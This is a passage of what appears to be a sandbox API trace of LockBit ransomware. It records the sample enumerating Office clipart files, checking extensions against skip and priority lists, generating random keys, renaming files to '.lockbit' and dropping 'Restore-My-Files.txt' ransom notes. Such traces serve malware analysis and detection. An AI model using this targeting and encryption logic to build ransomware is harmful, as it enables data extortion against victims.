(lpString1=".mrg", lpString2=".GIF") returned 1 [0184.490] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0184.490] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0184.490] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0184.490] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0184.490] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0184.490] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0184.490] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0184.490] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0184.490] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0184.490] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0184.490] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0184.490] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB00760L.GIF.lockbit") returned 85 [0184.490] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB00760L.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb00760l.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0184.491] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0184.492] malloc (_Size=0x40068) returned 0x1ff1e60 [0184.492] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=8979) returned 1 [0184.492] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0184.492] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0184.492] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0184.492] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0184.493] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0184.493] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0184.493] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0184.495] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB00760L.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB00760L.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0184.495] malloc (_Size=0xc0) returned 0x1fa2ed8 [0184.495] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xc0, FileInformationClass=0xa) returned 0x0 [0184.496] free (_Block=0x1fa2ed8) [0184.496] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB00760L.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds") returned 1 [0184.496] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt") returned 85 [0184.496] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0184.497] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x70875130, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x1f8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB00780L.GIF", cAlternateFileName="")) returned 1 [0184.497] lstrcmpiW (lpString1=".", lpString2="WB00780L.GIF") returned -1 [0184.497] lstrcmpiW (lpString1="..", lpString2="WB00780L.GIF") returned -1 [0184.497] PathFindExtensionW (pszPath="WB00780L.GIF") returned=".GIF" [0184.497] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0184.497] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0184.497] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0184.497] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0184.497] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0184.497] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0184.497] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0184.497] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0184.497] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0184.497] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0184.497] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0184.497] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0184.497] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0184.497] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0184.497] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0184.497] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0184.497] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0184.497] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0184.497] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0184.497] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0184.498] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0184.498] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0184.498] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0184.498] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0184.498] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0184.498] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0184.498] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0184.498] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0184.498] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0184.498] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0184.498] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0184.498] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0184.498] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0184.498] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0184.498] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0184.498] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0184.498] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0184.498] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0184.498] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0184.498] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0184.498] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0184.498] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0184.498] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0184.498] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0184.498] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0184.498] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0184.498] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0184.498] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB00780L.GIF") returned -1 [0184.498] lstrcmpiW (lpString1="ntldr", lpString2="WB00780L.GIF") returned -1 [0184.499] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB00780L.GIF") returned -1 [0184.499] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB00780L.GIF") returned -1 [0184.499] lstrcmpiW (lpString1="autorun.inf", lpString2="WB00780L.GIF") returned -1 [0184.499] lstrcmpiW (lpString1="thumbs.db", lpString2="WB00780L.GIF") returned -1 [0184.499] lstrcmpiW (lpString1="iconcache.db", lpString2="WB00780L.GIF") returned -1 [0184.499] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\") returned="" [0184.499] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB00780L.GIF") returned=".GIF" [0184.499] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0184.499] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0184.499] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0184.499] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0184.499] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0184.499] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0184.499] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0184.499] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0184.499] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0184.499] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0184.499] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0184.499] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0184.499] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0184.499] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0184.499] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0184.499] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0184.499] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0184.500] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0184.500] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0184.500] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0184.500] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0184.500] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0184.500] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0184.500] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0184.500] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0184.500] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0184.500] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0184.500] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0184.500] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB00780L.GIF.lockbit") returned 85 [0184.500] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB00780L.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb00780l.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0184.501] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0184.501] malloc (_Size=0x40068) returned 0x3d70450 [0184.501] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=8079) returned 1 [0184.501] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0184.502] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0184.502] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0184.502] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0184.502] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0184.502] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0184.502] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0184.508] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB00780L.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB00780L.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0184.508] malloc (_Size=0xc0) returned 0x1fa2ed8 [0184.508] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xc0, FileInformationClass=0xa) returned 0x0 [0184.510] free (_Block=0x1fa2ed8) [0184.510] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB00780L.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds") returned 1 [0184.510] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt") returned 85 [0184.510] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0184.510] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x70875130, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0xe1d, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB01741L.GIF", cAlternateFileName="")) returned 1 [0184.510] lstrcmpiW (lpString1=".", lpString2="WB01741L.GIF") returned -1 [0184.510] lstrcmpiW (lpString1="..", lpString2="WB01741L.GIF") returned -1 [0184.510] PathFindExtensionW (pszPath="WB01741L.GIF") returned=".GIF" [0184.510] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0184.510] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0184.510] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0184.510] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0184.510] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0184.510] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0184.510] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0184.510] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0184.510] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0184.510] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0184.510] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0184.510] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0184.510] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0184.511] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0184.511] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0184.511] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0184.511] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0184.511] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0184.511] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0184.511] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0184.511] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0184.511] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0184.511] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0184.511] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0184.511] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0184.511] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0184.511] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0184.511] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0184.511] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0184.511] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0184.511] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0184.511] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0184.511] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0184.511] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0184.511] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0184.511] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0184.512] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0184.512] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0184.512] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0184.512] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0184.512] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0184.512] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0184.512] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0184.512] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0184.512] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0184.512] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0184.512] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0184.512] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB01741L.GIF") returned -1 [0184.512] lstrcmpiW (lpString1="ntldr", lpString2="WB01741L.GIF") returned -1 [0184.512] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB01741L.GIF") returned -1 [0184.512] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB01741L.GIF") returned -1 [0184.512] lstrcmpiW (lpString1="autorun.inf", lpString2="WB01741L.GIF") returned -1 [0184.512] lstrcmpiW (lpString1="thumbs.db", lpString2="WB01741L.GIF") returned -1 [0184.512] lstrcmpiW (lpString1="iconcache.db", lpString2="WB01741L.GIF") returned -1 [0184.512] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\") returned="" [0184.512] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB01741L.GIF") returned=".GIF" [0184.512] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0184.512] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0184.512] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0184.513] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0184.513] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0184.513] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0184.513] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0184.513] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0184.513] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0184.513] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0184.513] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0184.513] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0184.513] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0184.513] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0184.513] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0184.513] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0184.513] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0184.513] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0184.513] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0184.513] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0184.513] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0184.513] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0184.513] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0184.513] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0184.513] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0184.514] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0184.514] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0184.514] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0184.514] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB01741L.GIF.lockbit") returned 85 [0184.514] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB01741L.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb01741l.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0184.515] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0184.515] malloc (_Size=0x40068) returned 0x3f70048 [0184.515] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=3613) returned 1 [0184.515] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0184.516] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0184.516] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0184.516] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0184.516] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0184.516] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0184.516] ReadFile (in: hFile=0x170, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0184.521] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB01741L.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB01741L.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0184.521] malloc (_Size=0xc0) returned 0x1fa2ed8 [0184.521] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xc0, FileInformationClass=0xa) returned 0x0 [0184.522] free (_Block=0x1fa2ed8) [0184.522] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB01741L.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds") returned 1 [0184.522] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt") returned 85 [0184.522] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0184.523] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x7089b290, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x38c, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB02039_.GIF", cAlternateFileName="")) returned 1 [0184.523] lstrcmpiW (lpString1=".", lpString2="WB02039_.GIF") returned -1 [0184.523] lstrcmpiW (lpString1="..", lpString2="WB02039_.GIF") returned -1 [0184.523] PathFindExtensionW (pszPath="WB02039_.GIF") returned=".GIF" [0184.523] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0184.523] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0184.523] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0184.523] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0184.523] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0184.523] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0184.523] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0184.523] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0184.523] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0184.523] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0184.523] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0184.523] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0184.523] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0184.523] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0184.523] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0184.524] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0184.524] lstrcmpiW 